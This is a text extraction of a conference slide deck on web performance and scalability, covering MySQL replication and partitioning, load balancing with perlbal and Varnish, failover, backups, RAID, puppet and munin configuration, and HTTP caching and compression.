More data more places! Share the load

Basic Replication
• Great for read intensive applications
• Write to one master
• Read from many slaves
(diagram: webservers write to the master, which replicates to the slaves; reads are spread over the slaves by a loadbalancer)
• Lots more details in "High Performance MySQL" (old, but until MySQL 6 the replication concepts are the same)

Relay slave replication
• Running out of bandwidth on the master?
• Replicating to multiple data centers?
• A "replication slave" can be master to other slaves
• Almost any possible replication scenario can be setup (circular, star replication, ...)
(diagram: writes from the webservers and a data loading script go to the master, which replicates through relay slaves A and B to the rest of the slave farm; reads go through the loadbalancer)

Replication Scaling – Reads
• Reading scales well with replication
• Great for (mostly) read-only applications
(diagram: going from one server to two roughly doubles read capacity)
(thanks to Brad Fitzpatrick!)

Replication Scaling – Writes (aka when replication sucks)
• Writing doesn't scale with replication
• All servers need to do the same writes
(diagram: every added server repeats all the writes, so the capacity left for reads barely grows)

Partition the data
Divide and Conquer! or Web 2.0 Buzzword Compliant! Now free with purchase of milk!!

Partition your data
• 96% read application? Skip this step...
• Solution to the too many writes problem: Don't have all data on all servers
• Use a separate cluster for different data sets
(diagram: a cat cluster and a dog cluster, each with its own master and slaves)

The Write Web!
• Replication too slow? Don't have replication slaves!
• Use a (fake) master-master setup and partition / shard the data!
• Simple redundancy!
• No latency from commit to data being available
• Don't bother with fancy 2 or 3 phase commits
• (Make each "main object" (user, product, ...) always use the same master – as long as it's available)
(diagram: master-master pairs for dogs, cats and fish)

Partition with a global master server
• Can't divide data up in "dogs" and "cats"?
• Flexible partitioning!
• The "global" server keeps track of which cluster has the data for user "623"
• Get all PKs from the global master
• Only auto_increment columns in the "global master"
• Aggressively cache the "global master" data (memcached)
• and/or use MySQL Cluster (ndb)
(diagram: a webserver asks the global master "Where is user 623?", hears "user 623 is in cluster 3", then runs "select * from some_data where user_id = 623" against data cluster 3; the global master has a slave as backup)

Master – Master setup
• Setup two replicas of your database copying changes to each-other
• Keep it simple! (all writes to one master)
• Instant fail-over host – no slave changes needed
• Configuration is easy!

set-variable = auto_increment_increment=2
set-variable = auto_increment_offset=1

(offset = 2 on second master)
• Setup both systems as a slave of the other

Online Schema Changes
The reasons we love master-master!
• Do big schema changes with no downtime!
• Stop A to B replication
• Move traffic to B
• Do changes on A
• Wait for A to catch up on replication
• Move traffic to A
• Re-start A to B replication

Hacks!
Don't be afraid of the data-duplication monster
http://flickr.com/photos/firevixen/75861588/

Summary tables!
• Find queries that do things with COUNT(*) and GROUP BY and create tables with the results!
• Data loading process updates both tables, or hourly/daily/... updates
• Variation: Duplicate data in a different "partition"
• Data affecting both a "user" and a "group" goes in both the "user" and the "group" partition (Flickr does this)

Summary databases!
• Don't just create summary tables – use summary databases!
• Copy the data into special databases optimized for special queries
• full text searches
• index with both cats and dogs
• anything spanning all clusters
• Different databases for different latency requirements (RSS feeds from replicated slave DB)

Make everything repeatable
• Script failed in the middle of the nightly processing job? (they will sooner or later, no matter what)
• How do you restart it?
• Build your "summary" and "load" scripts so they always can be run again! (and again and again)
• One "authoritative" copy of a data piece – summaries and copies are (re)created from there

Asynchronous data loading
• Updating counts? Loading logs?
• Don't talk directly to the database, send updates through Spread (or whatever) to a daemon loading data
• Don't update for each request:
update counts set count=count+1 where id=37
• Aggregate 1000 records or 2 minutes of data and do fewer database changes:
update counts set count=count+42 where id=37
• Being disconnected from the DB will let the frontend keep running if the DB is down!

"Manual" replication
• Save data to multiple "partitions"
• Application writes two places, or
• last_updated/modified_on and deleted columns, or
• Use triggers to add to a "replication_queue" table
• Background program to copy data based on the queue table or the last_updated column
• Build summary tables or databases in this process
• Build star/spoke replication system

Preload, -dump and -process
• Let the servers do as much as possible without touching the database directly
• Data structures in memory – ultimate cache!
• Dump never changing data structures to JS files for the client to cache
• Dump smaller read-only often accessed data sets to SQLite or BerkeleyDB and rsync to each webserver (or use NFS, but...)
• Or a MySQL replica on each webserver

Stored Procedures Dangerous
• Not horizontal
• Bad: Work done in the database server (unless it's read-only and replicated)
• Good: Work done on one of the scalable web fronts
• Only do stored procedures if they save the database work (network-io work > SP work)

a brief diversion ... Running Oracle now?
• Move read operations to MySQL!
• Replicate from Oracle to a MySQL cluster with "manual replication"
• Use triggers to keep track of changed rows in Oracle
• Copy them to the MySQL master server with a replication program
• Good way to "sneak" MySQL in ...
(diagram: webservers write to Oracle; a replication program copies changes to a MySQL master and its slaves, which serve the reads via a loadbalancer)

Optimize the database
Faster, faster, faster ....

... very briefly
• The whole conference here is about this ... so I'll just touch on a few ideas

Memory for MySQL = good
• Put as much memory as you can afford in the server (Currently 2GB sticks are the best value)
• InnoDB: Let MySQL use ~all memory (don't use more than is available, of course!)
• MyISAM: Leave more memory for OS page caches
• Can you afford to lose data on a crash? Optimize accordingly
• Disk setup: We'll talk about RAID later

What's your app doing?
• Enable query logging in your development DB! (you do have a devel db, right?)
• Are all those queries really necessary? Cache candidates?
• Just add "log=/var/lib/mysql/sql.log" to .cnf
• Slow query logging:
log-slow-queries
log-queries-not-using-indexes
long_query_time=1
• mysqldumpslow parses the slow log
• 5.1+ does not require a server restart and can log directly into a CSV table...

Table Choice
• Short version: Use InnoDB, it's harder to make them fall over
• Long version: Use InnoDB except for
• Big read-only tables (smaller, less IO)
• High volume streaming tables (think logging)
• Locked tables / INSERT DELAYED
• ARCHIVE table engine
• Specialized engines for special needs
• More engines in the future
• For now: InnoDB

Multiple MySQL instances
• Run different MySQL instances for different workloads
• Even when they share the same server anyway!
• InnoDB vs MyISAM instance
• Move to separate hardware and replication easier
• Optimize MySQL for the particular workload
• Very easy to setup with the instance manager or mysqld_multi
• mysql.com init.d script supports the instance manager (don't use the redhat/fedora script!)
(diagram: a prod cluster (innodb, normalized columns) feeding a search_load process into a search cluster (myisam, fulltext columns))

Config tuning helps, Query tuning works
• Configuration tuning helps a little
• The big performance improvements come from schema and query optimizations – focus on that!
• Design schema based on queries
• Think about what kind of operations will be common on the data; don't go for "perfect schema beauty"
• What results do you need? (now and in the future)

EXPLAIN
• Use the "EXPLAIN SELECT ..." command to check the query
• Baron Schwartz talks about this 2pm on Tuesday! Be sure to read

Use smaller data
• Use Integers
• Always use integers for join keys
• And when possible for sorts, group bys, comparisons
• Don't use bigint when int will do
• Don't use varchar(255) when varchar(20) will do

Store Large Binary Objects (aka how to store images)
• Meta-data table (name, size, ...)
• Store images either in the file system
• meta data says "server '123', filename 'abc'"
• (If you want this; use mogilefs or Amazon S3 for storage!)
• OR store images in other tables
• Split data up so each table doesn't get bigger than ~4GB
• Include "last modified date" in meta data
• Include it in your URLs if possible to optimize caching (/images/$timestamp/$id.jpg)

Reconsider Persistent DB Connections
• DB connection = thread = memory
• With partitioning all httpd processes talk to all DBs
• With lots of caching you might not need the main database that often
• MySQL connections are fast
• Always use persistent connections with Oracle!
• Commercial connection pooling products
• pgsql, sybase, oracle? Need thousands of persistent connections?
• In Perl the new DBD::Gofer can help with pooling!

InnoDB configuration
• innodb_file_per_table – splits your innodb data into a file per table instead of one big annoying file; makes "optimize table `table`" clear unused space
• innodb_buffer_pool_size=($MEM*0.80)
• innodb_flush_log_at_trx_commit setting
• innodb_log_file_size
• transaction-isolation = READ-COMMITTED

My favorite MySQL feature
• insert into t (somedate) values ("blah");
• insert into t (someenum) values ("bad value");
• Make MySQL picky about bad input!
• SET sql_mode = 'STRICT_TRANS_TABLES';
• Make your application do this on connect

Don't overwork the DB
• Databases don't easily scale
• Don't make the database do a ton of work
• Referential integrity is good
• Tons of stored procedures to validate and process data, not so much
• Don't be too afraid of de-normalized data – sometimes it's worth the tradeoffs (call them summary tables and the DBAs won't notice)

Use your resources wisely
don't implode when things run warm

Work in parallel
• Split the work into smaller (but reasonable) pieces and run them on different boxes
• Send the sub-requests off as soon as possible, do something else and then retrieve the results

Job queues
• Processing time too long for the user to wait?
• Can only process N requests / jobs in parallel?
• Use queues (and external worker processes)
• IFRAMEs and AJAX can make this really spiffy (tell the user "the wait time is 20 seconds")
(diagram: webservers put jobs in a queue DB; a pool of workers processes them)

Job queue tools
• Database "queue"
• Dedicated queue table, or just processed_on and grabbed_on columns (see the SQL sketch below, after the proxy list)
• Webserver submits job
• First available "worker" picks it up and returns the result to the queue
• Webserver polls for status

More Job Queue tools
• beanstalkd - great protocol, fast, no persistence (yet)
• gearman - for one off out-of-band jobs
• starling - from twitter, memcached protocol, disk based persistence
• TheSchwartz from SixApart, used in Movable Type
• Spread
• MQ / Java Messaging Service(?) / ...

Log http requests
• Log slow http transactions to a database: time, response_time, uri, remote_ip, user_agent, request_args, user, svn_branch_revision, log_reason (a "SET" column), ...
• Log to ARCHIVE tables, rotate hourly / weekly / ...
• Log 2% of all requests!
• Log all 4xx and 5xx requests
• Great for statistical analysis!
• Which requests are slower? Is the site getting faster or slower?
• Time::HiRes in Perl, microseconds from the gettimeofday system call

Intermission ? !

• Use light processes for light tasks
• Thin proxies: servers or threads for "network buffers"
• Goes between the user and your heavier backend application
• Built-in load-balancing! (for Varnish, perlbal, ...)
• httpd with mod_proxy / mod_backhand
• perlbal – more on that in a bit
• Varnish, squid, pound, ...
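Circling back to the database "queue" pattern from the job-queue slides above, a minimal SQL sketch (my own illustration; everything beyond the grabbed_on/processed_on idea is invented):

-- A queue table workers can poll.
CREATE TABLE job_queue (
    id           int unsigned NOT NULL auto_increment PRIMARY KEY,
    payload      text NOT NULL,
    worker       varchar(32) NULL,
    grabbed_on   datetime NULL,
    processed_on datetime NULL,
    result       text NULL
) ENGINE=InnoDB;

-- A worker claims the oldest unclaimed job; the grabbed_on IS NULL test
-- keeps two workers from taking the same row.
UPDATE job_queue
   SET worker = 'worker-1', grabbed_on = NOW()
 WHERE grabbed_on IS NULL
 ORDER BY id LIMIT 1;

-- ... then fetches whatever it claimed.
SELECT id, payload FROM job_queue
 WHERE worker = 'worker-1' AND processed_on IS NULL;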
Proxy illustration
(diagram: users talk to perlbal or mod_proxy (low memory/resource usage), which proxies to the backends (lots of memory, db connections etc))

Light processes
• Save memory and database connections
• This works spectacularly well. Really!
• Can also serve static files
• Avoid starting your main application as root
• Load balancing
• In particular important if your backend processes are "heavy"

Light processes
• Apache 2 makes it Really Easy

ProxyPreserveHost On
<VirtualHost *>
  ServerName combust.c2.askask.com
  ServerAlias *.c2.askask.com
  RewriteEngine on
  RewriteRule (.*) [P]
</VirtualHost>

• Easy to have different "backend environments" on one IP
• Backend setup (Apache 1.x):

Listen 127.0.0.1:8230
Port 80

perlbal configuration

CREATE POOL my_apaches
POOL my_apaches ADD 10.0.0.10:8080
POOL my_apaches ADD 10.0.0.11:8080
POOL my_apaches ADD 10.0.0.12
POOL my_apaches ADD 10.0.0.13:8081

CREATE SERVICE balancer
  SET listen          = 0.0.0.0:80
  SET role            = reverse_proxy
  SET pool            = my_apaches
  SET persist_client  = on
  SET persist_backend = on
  SET verify_backend  = on
ENABLE balancer

A few thoughts on development ...

All Unicode All The Time
• The web is international and multilingual, deal with it.
• All Unicode all the time! (except when you don't need it – urls, email addresses, ...)
• Perl: DBD::mysql was fixed last year! PHP 6 will have improved Unicode support. Ruby 2 will someday, too...
• It will never be easier to convert than now!

Use UTC – Coordinated Universal Time
• It might not seem important now, but some day ...
• It will never be easier to convert than now!
• Store all dates and times as UTC, convert to "local time" on display

Build on APIs
• All APIs All The Time!
• Use "clean APIs" internally in your application architecture
• Loosely coupled APIs are easier to scale
• Add versioning to APIs ("&api_version=123")
• Easier to scale development
• Easier to scale deployment
• Easier to open up to partners and users!

Why APIs?
• Natural place for "business logic"
• Controller = "Speak HTTP"
• Model = "Speak SQL"
• View = "Format HTML / ..."
• API = "Do Stuff"
• Aggregate just the right amount of data
• Awesome place for optimizations that matter!
• The data layer knows too little

More development philosophy
• Do the Simplest Thing That Can Possibly Work
• ... but do it really well!
• Balance the complexity, err on the side of simple
• This is hard!

Pay your technical debt
• Don't incur technical debt
• "We can't change that - last we tried the site went down"
• "Just add a comment with 'TODO'"
• "Oops. Where are the backups? What do you mean 'no'?"
• "Who has the email with that bug?"
• Interest on technical debt will kill you
• Pay it back as soon as you can!

Coding guidelines
• Keep your formatting consistent!
• perl: perltidy, perl best practices, Perl::Critic
• Keep your APIs and module conventions consistent
• Refactor APIs mercilessly (in particular while they are not public)

qmail lessons
• Lessons from 10 years of qmail
• Research paper from Dan Bernstein
• Eliminate bugs
• Test coverage
• Keep data flow explicit
(continued)

qmail lessons (2)
• Eliminate code – less code = less bugs!
• Refactor common code
• Reuse code (Unix tools / libs, CPAN, PEAR, Ruby Gems, ...)
• Reuse access control
• Eliminate trusted code – what needs access?
• Treat transformation code as completely untrusted

Joint Strike Fighter
• ~Superset of the "Motor Industry Software Reliability Association Guidelines For The Use Of The C Language In Vehicle Based Software"
• Really Very Detailed!
• No recursion!
• (Ok, ignore this one :-) )
• Do make guidelines – know when to break them
• Have code reviews - make sure every commit email gets read (and have automatic commit emails in the first place!)

High Availability and Load Balancing and Disaster Recovery

High Availability
• Automatically handle failures! (bad disks, failing fans, "oops, unplugged the wrong box", ...)
• For your app servers the load balancing system should take out "bad servers" (most do)
• perlbal or Varnish can do this for http servers
• Easy-ish for things that can just "run on lots of boxes"

Make that service always work!
• Sometimes you need a service to always run, but on specific IP addresses
• Load balancers (level 3 or level 7: perlbal/varnish/squid)
• Routers
• DNS servers
• NFS servers
• Anything that has failover or an alternate server – the IP needs to move (much faster than changing DNS)

Load balancing
• Key to horizontal scaling (duh)
• 1) All requests go to the load balancer 2) Load balancer picks a "real server"
• Hardware (lots of vendors) – Coyote Point have relatively cheaper ones; look for older models for cheap on eBay!
• Linux Virtual Server
• Open/FreeBSD firewall rules (pf firewall pools) (no automatic failover, have to do that on the "real servers")

Load balancing 2
• Use a "level 3" (tcp connections only) tool to send traffic to your proxies
• Through the proxies do "level 7" (http) load balancing
• perlbal has some really good features for this!

perlbal
• Event based, for HTTP load balancing, web serving, and a mix of the two (see below).
• Practical fancy features like "multiplexing" keep-alive connections to both users and back-ends
• Everything can be configured or reconfigured on the fly
• If you configure your backends to only allow as many connections as they can handle (you should anyway!), perlbal will automatically balance the load "perfectly"
• Can actually give Perlbal a list of URLs to try. Perlbal will find one that's alive. Instant failover!

Varnish
• Modern high performance http accelerator
• Optimized as a "reverse cache"
• Whenever you would have used squid, give this a look
• Recently got "Vary" support
• Super efficient (except it really wants to "take over" a box)
• Written by Poul-Henning Kamp, famed FreeBSD contributor
• BSD licensed, work is being paid for by a Norwegian newspaper

Fail-over tools – "move that IP"

Buy a "hardware load balancer"
• Generally Quite Expensive (Except on eBay - used network equipment is often great)
• Not appropriate (cost-wise) until you have MANY servers
• If the feature list fits, it "Just Works"
• ... but when we are starting out, what do we use?

wackamole
• Simple, just moves the IP(s)
• Can embed Perl so you can run Perl functions when IPs come and go
• Easy configuration format
• Setup "groups of IPs"
• Supports Linux, FreeBSD and Solaris
• Spread toolkit for communication
• Easy to troubleshoot (after you get Spread working...)
Heartbeat
• Monitors and moves services (an IP address is "just a service")
• v1 has a simple but goofy configuration format
• v2 supports all sorts of groupings, larger clusters (up to 16 servers)
• Uses /etc/init.d type scripts for running services
• Maybe more complicated than you want your HA tools

Carp + pfsync
• Patent-free version of Ciscos "VRRP" (Virtual Router Redundancy Protocol)
• FreeBSD and OpenBSD only
• Carp (moves IPs) and pfsync (synchronizes firewall state)
• (awesome for routers and NAT boxes)
• Doesn't do any service checks, just moves IPs around

mysql master master replication manager
• mysql-master-master tool can do automatic failover!
• No shared disk
• Define potential "readers" and "writers"
• List of "application access" IPs
• Reconfigures replication
• Moves IPs

Suggested Configuration
• Open/FreeBSD routers with Carp+pfsync for firewalls
• A set of boxes with perlbal + wackamole on static "always up" HTTP enabled IPs
• Trick on Linux: Allow the perlbal processes to bind to all IPs (no port number tricks or service reconfiguration or restarts!)

echo 1 > /proc/sys/net/ipv4/ip_nonlocal_bind
or sysctl -w net.ipv4.ip_nonlocal_bind=1
or echo net.ipv4.ip_nonlocal_bind = 1 >> /etc/sysctl.conf

• Dumb regular http servers "behind" the perlbal ones
• wackamole for other services like DNS
• mmm for mysql fail-over

Redundancy fallacy!
• Don't confuse load-balancing with redundancy
• What happens when one of these two fail?
(diagram: two load balanced servers at 55% and 60% load; lose one and you have more than 100% load on the survivor – oops, no redundancy!)
• Always have "n+1" capacity
• Consider having a "passive spare" (active/passive with two servers)
• Careful load monitoring! (Munin, MySQL Network, ganglia, cacti, ...)

High availability – Shared storage
• NFS servers (for diskless servers, ...)
• Failover for database servers
• Traditionally either via fiber or SCSI connected to both servers
• Or NetApp filer boxes
• All expensive and smells like "the one big server"

Cheap high availability storage with DRBD
• Synchronizes a block device between two servers!
• "Network RAID1"
• Typically used in Active/Primary-Standby/Secondary setup
• If the active server goes down the secondary server will switch to primary, run fsck, mount the device and start the service (MySQL / NFS server / ...)
• v0.8 can do writes on both servers at once – "shared disk semantics" (you need a filesystem on top that supports that, OCFS, GFS, ... – probably not worth it, but neat)

Disaster Recovery
• Separate from "fail-over" (no disaster if we failed-over...)
• "The rescue truck fell in the water"
• "All the 'redundant' network cables melted"
• "The datacenter got flooded"
• "The grumpy sysadmin sabotaged everything before he left"

Disaster Recovery Planning
• You won't be back up in 2 hours, but plan so you quickly will have an idea how long it will be
• Have a status update site / weblog
• Plans for getting hardware replacements
• Plans for getting running temporarily on rented "dedicated servers" (ev1servers, rackspace, ...)
• And ....

Backup your database!
• Binary logs!
• Keep track of "changes since the last snapshot"
• Use replication to Another Site (doesn't help on "for $table = @tables { truncate $table }")
• On small databases use mysqldump
• Zmanda MySQL Backup (or whatever similar tool your database comes with) packages the different tools and options

Backup Big Databases
• Use mylvmbackup to snapshot and archive
• Requires data on an LVM device (just do it)
• InnoDB: Automatic recovery! (ooh, magic)
• MyISAM: Read Lock your database for a few seconds before making the snapshot (on MySQL do a "FLUSH TABLES" first (which might be slow) and then a "FLUSH TABLES WITH READ LOCK" right after)
• Sync the LVM snapshot elsewhere
• And then remove the snapshot!
• Bonus Optimization: Run the backup from a replication slave!

Backup on replication slave
• Or just run the backup from a replication slave ...
• Keep an extra replica of your master
• shutdown mysqld and archive the data
• Small-ish databases: mysqldump --single-transaction

All Automation All The Time
or How to manage 200 servers in your spare-time

System Management – Keep software deployments easy
• Make upgrading the software a simple process
• Script database schema changes
• Keep configuration minimal
• Servername ("")
• Database names ("userdb = host=db1;db=users";...)
• If there's a reasonable default, put the default in the code (for example )
• "deployment_mode = devel / test / prod" lets you put reasonable defaults in code

Easy software deployment 2
• How do you distribute your code to all the app servers?
• Use your source code repository (Subversion etc)! (tell your script to svn up to revision 123 and restart)
• .tar.gz to be unpacked on each server
• .rpm or .deb package
• NFS mount and symlinks
• No matter what: Make your test environment use the same mechanism as production, and: Have it scripted! (actually, have everything scripted!)

Configuration management – Rule Number One
• Configuration in SVN (or similar) "infrastructure/" repository
• SVN rather than rcs to automatically have a backup in the Subversion server – which you are carefully backing up anyway
• Keep notes! Accessible when the wiki is down; easy to grep
• Don't worry about perfect layout; just keep it updated

Configuration management – Rule Two
• Repeatable configuration!
• Can you reinstall any server Right Now?
• Use tools to keep system configuration in sync
• Upcoming configuration management (and more) tools!
• csync2 (librsync and sqlite based sync tool)
• puppet (central server, rule system, ruby!)

puppet
• Automating sysadmin tasks!
• 1) Client provides "facter" to server 2) Server makes configuration 3) Client implements configuration

service { "sshd": enable => true, ensure => running }
package { "vim-enhanced": ensure => installed }
package { "emacs": ensure => installed }

puppet example

node db-server inherits standard {
    include mysql_server
    include solfo_hw
}

node db2, db3, db4 inherits db-server { }

node trillian inherits db-server {
    include ypbot_devel_dependencies
}

# -----------------------------
class mysql_client {
    package { "MySQL-client-standard": ensure => installed }
    package { "MySQL-shared-compat": ensure => installed }
}

class mysql_server {
    file { "/mysql": ensure => directory, }
    package { "MySQL-server-standard": ensure => installed }
}

include mysql_client

puppet mount example
• Ensure an NFS mount exists, except on the NFS servers

class nfs_client_pkg {

    file { "/pkg": ensure => directory, }

    $mount = $hostname ?
{ "nfs-a" => absent, "nfs-b" => absent, default => mounted } mount { "/pkg": atboot => true, device => 'nfs.la.sol:/pkg', ensure => $mount, fstype => 'nfs4', options => 'ro,intr,noatime', require => File["/pkg"], } } More puppet features • In addition to services, packages and mounts... • • • • • Manage users Manage crontabs Copy configuration files (with templates) … and much more Recipes, reference documentation and more at Backups! • • Backup everything you can • • • • • • Check/test the backups routinely Super easy deployment: rsnapshot Uses rsync and hardlinks to efficiently store many backup generations Server initiated – just needs ssh and rsync on client Simple restore – files • Other tools Amanda (Zmanda) Bacula Backup is cheap! • • • Extra disk in a box somewhere? That can do! Disks are cheap – get more! Disk backup server in your office: Enclosure + PSU: $275 CPU + Board + RAM: $400 3ware raid (optional): $575 6x1TB disks: $1700 (~4TB in raid 6) = $3000 for 4TB backup space, easily expandable (or less than $5000 for 9TB space with raid 6 and hot standby) • Ability to get back your data = Priceless! somewhat tangentially ... RAID Levels RAID-I (1989) consisted of a Sun 4/280 workstation with 128 MB of DRAM, four dualstring SCSI controllers, 28 5.25-inch SCSI disks and specialized disk striping software. Basic RAID levels • • • • • RAID 0 Stripe all disks (capacity = N*S Fail: Any disk RAID 1 Mirror all disks (capacity = S) Fail: All disks RAID 10 Combine RAID 1 and 0 (capacity = N*S / 2) RAID 5 RAID 0 with parity (capacity = N*S - S) Fail: 2 disks RAID 6 Two parity disks (capacity = N*S - S*2) Fail: 3 disks! RAID 1 • • • Mirror all disks to all disks Simple - easiest to recover! Use for system disks and small backup devices RAID 0 • • • • • • Use for redundant database mirrors or scratch data that you can quickly rebuild Absolutely never for anything you care about Failure = system failure Great performance; no safety Capacity = 100% Disk IO = every IO available is “useful” RAID 10 • • • • • Stripe of mirrored devices IO performance and capacity of half your disks - not bad! Relatively good redundancy, lose one disk from each of the “sub-mirrors” Quick rebuild: Just rebuild one mirror More disks = more failures! If you have more than X disks, keep a hot spare. RAID 5 • • • • • Terrible database performance A partial block write = read all disks! When degraded a RAID 5 is a RAID 0 in redundancy! Rebuilding a RAID 5 is a great way to find more latent errors Don’t use RAID 5 – just not worth it RAID 6 • • • Like RAID 5 but doesn’t fail as easily Can survive two disks failing Don’t make your arrays too big • • 12 disks = 12x failure rate of one disk! Always keep a hot-spare if you can Hardware or software RAID? • • Hardware RAID: Worth it for the Battery Backup Unit! • • • • Battery allows the controller to – safely – fake “Sure mister, it’s safely on disk” responses No Battery? Use Software RAID Low or no CPU use Easier and faster to recover from failures! • • Write-intent bitmap More flexible layout options RAID 1 partition for system + RAID 10 for data on each disk nagios • • • • Monitoring “is the website up” is easy Monitoring dozens or hundreds of sub-systems is hard Monitor everything! Disk usage, system daemons, applications daemons, databases, data states, ... nagios configuration tricks • • nagios configuration is famously painful Somewhat undeserved! 
• examples of simple configuration - templates - groups

nagios best practices
• All alerts must be "important" – if some alerts are ignored, all other alerts easily are, too.
• Don't get 1000 alerts if a DB server is down
• Don't get paged if 1 of 50 webservers crashed
• Why do you as a non-sysadmin care?
• Use nagios to help the sysadmins fix the application
• Get information to improve reliability

Resource management
• If possible, only run one service per server (makes monitoring/managing your capacity much easier)
• Balance how you use the hardware
• Use memory to save CPU or IO
• Balance your resource use (CPU vs RAM vs IO)
• Extra memory on the app server? Run memcached!
• Extra CPU + memory? Run an application server in a Xen box!
• Don't swap memory to disk. Ever.

Netboot your application servers!
• Definitely netboot the installation (you'll never buy another server with a tedious CD/DVD drive)
• RHEL / Fedora: Kickstart + puppet = from box to all running in ~10 minutes
• Netboot application servers
• FreeBSD has awesome support for this
• Debian is supposed to
• Fedora Core 7/8?? looks like it will (RHEL5uX too?)

No shooting in foot!
• Ooops? Did that leak memory again? Development server went kaboom?
• Edit /etc/security/limits.conf:

@users  soft  rss  250000
@users  hard  rss  250000
@users  hard  as   500000

• Use it to set higher open files limits for mysqld etc, too!

noatime mounts
• Mount ~all your filesystems "noatime"
• By default the filesystem will do a write every time it accesses/reads a file!
• That's clearly insane
• Stop the madness, mount noatime:

/dev/vg0/lvhome  /home  ext3  defaults  1 2
/dev/vg0/lvhome  /home  ext3  noatime   1 2

graph everything!
• mrtg – The Multi Router Traffic Grapher
• rrdtool – round-robin-database tool
• Fixed size database handling time series data
• Lots of tools built on rrdtool
• ganglia – cluster/grid monitoring system

Historical perspective
(graph: a basic bandwidth graph annotated "Launch", "Steady growth", "Try CDN", "Enable compression for all browsers")

munin
• "Hugin and Munin are the ravens of the Norse god king Odin. They flew all over Midgard for him, seeing and remembering, and later telling him."
• Munin is also AWESOME!
• Shows trends for system statistics
• Easy to extend

mysql query stats – Query cache useful?
• Is the MySQL query cache useful for your application?
• Make a graph! In this particular installation it answers half of the selects

squid cache hitratio?
(graph: red = cache miss, green = cache hit)
• Increased cache size to get a better hit ratio – Huh? When?
• Don't confuse graphs with "hard data" – keep the real numbers, too!

munin: capacity planning, cpu
(graph: xen system, 6 cpus, plenty to spare)

Blocking on disk I/O?
(graph: pink = iowait) This box needs more memory or faster disks!

More IO Wait fun
(graphs: an 8 CPU box - harder to see the details - with high IO wait; after a memory upgrade, iowait dropped!)

IO Statistics
(graphs: per disk IO statistics – more memory, less disk IO)

more memory stats
(graphs: fix app config – plenty memory free; fix perlbal leak – room for memcached?; it took a week to use the new memory for caching – plenty memory to run memcached here!)

munin: spot a problem?
(graph: 1 CPU 100% busy on "system"? Started a few days ago)
• Has it happened before? Yup - occasionally!
• IPMI driver went kaboom!

Make your own Munin plugin
• Any executable with the right output:

# ./load config
graph_title Load average
graph_args --base 1000 -l 0
graph_vlabel load
...
load.label load
load.info Average load for the five minutes.
...
# ./load fetch
load.value 1.67

Munin as a nagios agent
• Use a Nagios plugin to talk to munin!
• Munin is already setup to monitor important metrics
• The Nagios plugin talks to munin as if it were the collector agent

define service {
    use                 local-service
    hostgroup_name      xen-servers,db-servers,app-servers
    service_description df
    check_command       check_munin!df!88!94
}

A little on hardware
• Hardware is a commodity! Configuring it isn't (yet – Google AppEngine!)
• Managed services - cthought.com, RackSpace, SoftLayer ...
• Managing hardware != Managing systems
• Rent A Server (crummy support, easy on hardware replacements, easy on cashflow)
• Amazon EC2 (just announced persistent storage!)
• Use standard configurations and automatic deployment
• Now you can buy or rent servers from anywhere!

Use a CDN
• If you serve more than a few TB of static files a month...
• Consider a Content Delivery Network
• Fast for users, easier on your network
• Pass-through proxy cache - easy deployment
• Akamai, LimeLight, PantherExpress, CacheFly, ... (only Akamai supports compressed files (??))

Client Performance
"Best Practices for Speeding Up Your Web Site"

Recommended Reading
• "High Performance Web Sites" book by Steve Souders
• /performance/
• Use YSlow – Firefox extension made by Yahoo!
• Quickly checks your site for the Yahoo Performance Guidelines
• I'll quickly go over a few server / infrastructure related rules ...

Minimize HTTP Requests
• Generate and download the main html in 0.3 seconds
• Making connections and downloading 38 small dependencies (CSS, JS, PNG, …) – more than 0.3s!
• Combine small JS and CSS files into fewer larger files
• Make it part of your release process!
• In development use many small files, in production group them
• CSS sprites to minimize image requests

Add an "Expires" header
• Avoid unnecessary "yup, that hasn't changed" requests
• Tell the browser to cache objects with HTTP headers:
(photo: flickr.com/photos/leecullivan)

Expires: Mon, Jan 28 2019 23:45:00 GMT
Cache-Control: max-age=315360000

• Must change the URL when the file changes!

Ultimate Cache Control
• Have all your static resources be truly static
• Change the URL when the resource changes
• Version number – from Subversion, git, … /js/foo.v1.js /js/foo.v2.js ...
• Modified timestamp – good for development /js/foo.v1206878853.js
• (partial) MD5 of file contents – safe for cache poisoning /js/foo.v861ad7064c17.js
• Build a "file to version" mapping in your build process and load it in the application

Serve "versioned" files
• Crazy easy with Apache rewrite rules
• "/js/foo.js" is served normally
• "/js/foo.vX.js" is served with extra cache headers

RewriteEngine on
# remove version number, set environment variable
RewriteRule ^/(.*\.)v[0-9a-f.]+\.(css|js|gif|png|jpg|ico)$ \
  /$1$2 [E=VERSIONED_FILE:1]

# Set headers when "VERSIONED_FILE" environment is set
Header add "Expires" "Fri, Nov 10 2017 23:45:00 GMT" env=VERSIONED_FILE
Header add "Cache-Control" "max-age=315360001" env=VERSIONED_FILE

Minimize CSS, JS and PNG
• Minimize JS and CSS files (remove whitespace, shorten JS, …)
• Add to your "version map" if you have a "-min" version of the file to be used in production
• Losslessly recompress PNG files with OptiPNG

Pre-minimized JS – ~1600 to ~1100 bytes – ~30% saved!
(the slide showed an example JavaScript callback before minification; the code survived extraction only in fragments)
Minimized JS
(the minified version of the same snippet was likewise mangled in extraction)

Gzip components
• Don't make the users download several times more data than necessary.
• Browser: Accept-Encoding: gzip, deflate
• Server: Content-Encoding: gzip
• Dynamic content (Apache 2.x):

LoadModule mod_deflate …
AddOutputFilterByType DEFLATE text/html text/plain text/javascript text/xml

Gzip static objects
• Pre-compress .js and .css files in the build process: foo.js > foo.js.gzip

AddEncoding gzip .gzip
# If the user accepts gzip data
RewriteCond %{HTTP:Accept-Encoding} gzip
# … and we have a .gzip version of the file
RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME}.gzip -f
# then serve that instead of the original file
RewriteRule ^(.*)$ $1.gzip [L]

Think Horizontal!
remember (and go build something neat!)

Books!
• "Building Scalable Web Sites" by Cal Henderson of Flickr fame – Only $26 on Amazon! (But it's worth the $40 from your local bookstore too)
• "Scalable Internet Architectures" by Theo Schlossnagle – Teaching concepts with lots of examples
• "High Performance Web Sites" by Steve Souders – Front end performance

Thanks! Direct and indirect help from ...
Cal Henderson, Flickr / Yahoo!; Brad Fitzpatrick, LiveJournal / SixApart; Google; Graham Barr; Tim Bunce; Perrin Harkins; David Wheeler; Tom Metro; Kevin Scaldeferri, Overture / Yahoo!; Vani Raja Hansen; Jay Pipes; Joshua Schachter; Ticketmaster; Shopzilla; .. and many more

– The End –
Questions? Thank you!
More questions? Comments? Need consulting? [email protected]
https://www.scribd.com/document/2569319/Real-World-Web-Performance-Scalability
CC-MAIN-2017-43
en
